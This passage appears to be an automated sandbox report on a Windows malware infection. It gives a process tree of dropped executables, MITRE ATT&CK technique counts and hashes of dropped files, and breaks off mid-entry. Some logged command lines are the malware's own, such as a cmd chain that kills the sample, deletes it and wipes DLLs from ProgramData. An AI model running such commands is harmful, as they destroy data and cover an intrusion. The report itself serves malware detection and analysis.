                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1840
                                                                          • C:\Windows\system32\msiexec.exe
                                                                            C:\Windows\system32\msiexec.exe /V
                                                                            1⤵
                                                                            • Enumerates connected drives
                                                                            • Drops file in Program Files directory
                                                                            • Drops file in Windows directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2824
                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 71C56588997B3134BDAE876A88A73216 C
                                                                              2⤵
                                                                              • Loads dropped DLL
                                                                              PID:4384
                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding B3F8ACFD3A40AE886B002650A5D73FA3
                                                                              2⤵
                                                                              • Blocklisted process makes network request
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4872
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                PID:4656
                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding BBC881E864E85C9E001B3C382BB08584 E Global\MSI0000
                                                                              2⤵
                                                                              • Loads dropped DLL
                                                                              PID:5980
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            PID:4516
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            PID:5460
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:1124
                                                                            • C:\Users\Admin\AppData\Local\Temp\DC04.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\DC04.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4548
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                2⤵
                                                                                  PID:5220
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout 1
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4460
                                                                                • C:\Users\Admin\AppData\Local\Temp\DC04.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\DC04.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:5244
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im DC04.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DC04.exe" & del C:\ProgramData\*.dll & exit
                                                                                    3⤵
                                                                                      PID:4532
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im DC04.exe /f
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2192
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        4⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4100
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 1500
                                                                                    2⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Program crash
                                                                                    PID:3128
                                                                                • C:\Users\Admin\AppData\Local\Temp\E0D7.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\E0D7.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4336
                                                                                  • C:\Users\Admin\AppData\Local\Temp\E0D7.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\E0D7.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5412
                                                                                • C:\Users\Admin\AppData\Local\Temp\E609.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\E609.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5388
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 736
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Program crash
                                                                                    PID:5760
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 752
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:6016
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 852
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4416
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 888
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:584
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1180
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5032
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 612
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5752
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1308
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:1520
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1368
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:6064
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1244
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5000
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1432
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4148
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1176
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2256
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1488
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2224
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1528
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2368
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1376
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5392
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1640
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5960
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1460
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2164
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1660
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4116
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1700
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2264
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1460
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2208
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1744
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5940
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1784
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4980
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1888
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4284
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1620
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4924
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1944
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4192
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1832
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:1900
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1984
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4764
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1620
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4164
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2032
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5700
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1928
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5056
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1960
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:5180
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1816
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:4592
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1996
                                                                                    2⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    • Executes dropped EXE
                                                                                    • Program crash
                                                                                    PID:3972
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:5832
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                      PID:4144
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:5164
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:6020
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:3760
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:3156
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5864
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5396
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:4504
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                              1⤵
                                                                                                PID:5680
                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                1⤵
                                                                                                  PID:4292
                                                                                                • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                  C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5132
                                                                                                  • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                    C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:2872
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:6124
                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  PID:2856
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:3764
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:5648
                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                  1⤵
                                                                                                    PID:4172
                                                                                                  • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                    C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4592
                                                                                                    • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                      C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:3936
                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                    C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                                                                                                    1⤵
                                                                                                    • Windows security modification
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:5316
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:5068
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:4448
                                                                                                      • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                        C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4660
                                                                                                        • C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                          C:\Users\Admin\AppData\Roaming\ttfiabd
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:3968

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                      Execution

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      Persistence

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1060

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Privilege Escalation

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053

                                                                                                      Defense Evasion

                                                                                                      Disabling Security Tools

                                                                                                      2
                                                                                                      T1089

                                                                                                      Modify Registry

                                                                                                      5
                                                                                                      T1112

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Install Root Certificate

                                                                                                      1
                                                                                                      T1130

                                                                                                      Credential Access

                                                                                                      Credentials in Files

                                                                                                      5
                                                                                                      T1081

                                                                                                      Discovery

                                                                                                      Software Discovery

                                                                                                      1
                                                                                                      T1518

                                                                                                      Query Registry

                                                                                                      5
                                                                                                      T1012

                                                                                                      System Information Discovery

                                                                                                      5
                                                                                                      T1082

                                                                                                      Security Software Discovery

                                                                                                      1
                                                                                                      T1063

                                                                                                      Peripheral Device Discovery

                                                                                                      2
                                                                                                      T1120

                                                                                                      Remote System Discovery

                                                                                                      1
                                                                                                      T1018

                                                                                                      Collection

                                                                                                      Data from Local System

                                                                                                      5
                                                                                                      T1005

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files\Windows Security\BDKZWYMNAZ\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\Windows Security\BDKZWYMNAZ\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                        MD5

                                                                                                        21ec89966012581b223f37dfcb95439a

                                                                                                        SHA1

                                                                                                        8c25eaae58a7ac90ad37ad6c9f341f94e1089ed3

                                                                                                        SHA256

                                                                                                        1765b0a85d23a048d83b9952c834498808fc59444eb4d6ef07a80109ae5b8f7c

                                                                                                        SHA512

                                                                                                        349273db8f045a414fb747ebd634179e48c3b22117fc5deb66a8c805f3620b8e7c3682e700a975482d683f3c8f945099c6408e3ae46fd41132727bc8143bd319

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                        MD5

                                                                                                        738f87d95d3387db176a831bd856d41a

                                                                                                        SHA1

                                                                                                        6c93f69de565349d8674fa25ac93906209478a8e

                                                                                                        SHA256

                                                                                                        5353cc718ad3df331ec39394a3e2b161eb273f5d915371dfb388a913f2f2d979

                                                                                                        SHA512

                                                                                                        b4492e41ed2cb21912da1761d0827898c2ae9f541f82f5911c3d9c1d99127f6289a6956ae8f0f9f86ce34be97958d0c749017182d2971800e39c5a347185e196

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                        MD5

                                                                                                        eb1ca99618882bea9f16821c1c31cca4

                                                                                                        SHA1

                                                                                                        9034fbe984208178f45baa3614006d9a1ff28ab6

                                                                                                        SHA256

                                                                                                        b410f85d899f0639381be14d78d17fcd13757ded30e4f62de21ba947f30e9ed9

                                                                                                        SHA512

                                                                                                        b25eda2d6c2b67123e30f3e8b2625309416decf1d3b110966e2ccb6835f0272303b0d841b4b4e9d82275e278e499a533b1ffe94b8ad7d1860ecbcbc6bfb32f48

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                        MD5

                                                                                                        0f675a3a91610a53fa26925bb911b6b2

                                                                                                        SHA1

                                                                                                        e25f27bea247fdec84df9661bd44528974ae49de

                                                                                                        SHA256

                                                                                                        235f2743b3b41f1925e6926d537598502de6d6df968f8a39da822d2ad40d2daa

                                                                                                        SHA512

                                                                                                        0d65f99f2056a8fecd8e48cfa83f97cd0d872a199cc7997e3add6b1ca8d609a8d2a153c730e183a23f2f5ba4bf71234396535f4c4fdb57da380cf0d08fa93f9d

                                                                                                      • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                                        MD5

                                                                                                        a2e5aa6e6b0260e1c7a77c9f012dd8fb

                                                                                                        SHA1

                                                                                                        3812fa76a5dda988a0a3388e01473edb4964dd00

                                                                                                        SHA256

                                                                                                        2c5ce8f0ceccfa359a762d1f358f020968f0a0f4d8d9a44b8273a84942183d4d

                                                                                                        SHA512

                                                                                                        dbfe53d58d78abf69584c0a81e3020c1522b6b21440887c4a4dacc5a279370f1f2d6c9755ea6b2176d2beb5b78ea553e09441f22faf026df13a7e1cd5bf6d06b

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Dezhashyshysi.exe
                                                                                                        MD5

                                                                                                        1f19330a59c0369f5d0b77b02f275568

                                                                                                        SHA1

                                                                                                        0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                        SHA256

                                                                                                        f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                        SHA512

                                                                                                        3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Dezhashyshysi.exe
                                                                                                        MD5

                                                                                                        1f19330a59c0369f5d0b77b02f275568

                                                                                                        SHA1

                                                                                                        0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                                        SHA256

                                                                                                        f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                                        SHA512

                                                                                                        3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Dezhashyshysi.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Kenessey.txt
                                                                                                        MD5

                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                        SHA1

                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                        SHA256

                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                        SHA512

                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8f-94c10-7f8-fd6b9-2beab5d9018a9\Qitesawyzhy.exe
                                                                                                        MD5

                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                        SHA1

                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                        SHA256

                                                                                                        f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                        SHA512

                                                                                                        32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8f-94c10-7f8-fd6b9-2beab5d9018a9\Qitesawyzhy.exe
                                                                                                        MD5

                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                        SHA1

                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                        SHA256

